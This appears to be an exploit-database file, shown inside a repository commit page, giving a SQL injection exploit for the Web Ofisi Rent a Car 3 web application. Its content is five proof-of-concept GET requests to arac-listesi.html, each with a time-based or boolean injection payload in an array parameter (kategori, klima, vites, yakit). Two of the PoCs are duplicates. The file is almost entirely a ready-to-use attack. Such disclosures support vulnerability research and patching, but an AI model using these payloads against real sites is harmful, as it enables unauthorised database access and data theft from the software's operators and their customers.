7ec7ea72de
10 changes to exploits/shellcodes MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter) fuelCMS 1.4.1 - Remote Code Execution Web Ofisi E-Ticaret 3 - 'a' SQL Injection Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection Web Ofisi Emlak 2 - 'ara' SQL Injection Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection Web Ofisi Firma Rehberi 1 - 'il' SQL Injection Web Ofisi Rent a Car 3 - 'klima' SQL Injection Web Ofisi Firma 13 - 'oz' SQL Injection REDCap < 9.1.2 - Cross-Site Scripting
43 lines
No EOL
1.3 KiB
Text
43 lines
No EOL
1.3 KiB
Text
# Exploit Title: Web Ofisi Rent a Car 3 - 'klima' SQL Injection
|
|
# Date: 2019-07-19
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor: https://www.web-ofisi.com/detay/rent-a-car-v3.html
|
|
# Demo Site: http://demobul.net/rentacarv3/
|
|
# Version: v3
|
|
# Tested on: Kali Linux
|
|
# CVE: N/A
|
|
|
|
----- PoC 1: SQLi -----
|
|
|
|
Request:
|
|
http://localhost/[PATH]/arac-listesi.html?kategori[]=0&klima[]=1&vites[]=1&yakit[]=1
|
|
Vulnerable Parameter: kategori[] (GET)
|
|
Payload: if(now()=sysdate(),sleep(0),0)
|
|
|
|
----- PoC 2: SQLi -----
|
|
|
|
Request:
|
|
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
|
|
Vulnerable Parameter: klima[] (GET)
|
|
Payload: 1 AND 3*2*1=6 AND 695=695
|
|
|
|
----- PoC 3: SQLi -----
|
|
|
|
Request:
|
|
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
|
|
Vulnerable Parameter: vites[] (GET)
|
|
Payload: 1 AND 3*2*1=6 AND 499=499
|
|
|
|
----- PoC 4: SQLi -----
|
|
|
|
Request:
|
|
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
|
|
Vulnerable Parameter: vites[] (GET)
|
|
Payload: 1 AND 3*2*1=6 AND 499=499
|
|
|
|
----- PoC 5: SQLi -----
|
|
|
|
Request:
|
|
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
|
|
Vulnerable Parameter: yakit[] (GET)
|
|
Payload: 1 AND 3*2*1=6 AND 602=602 |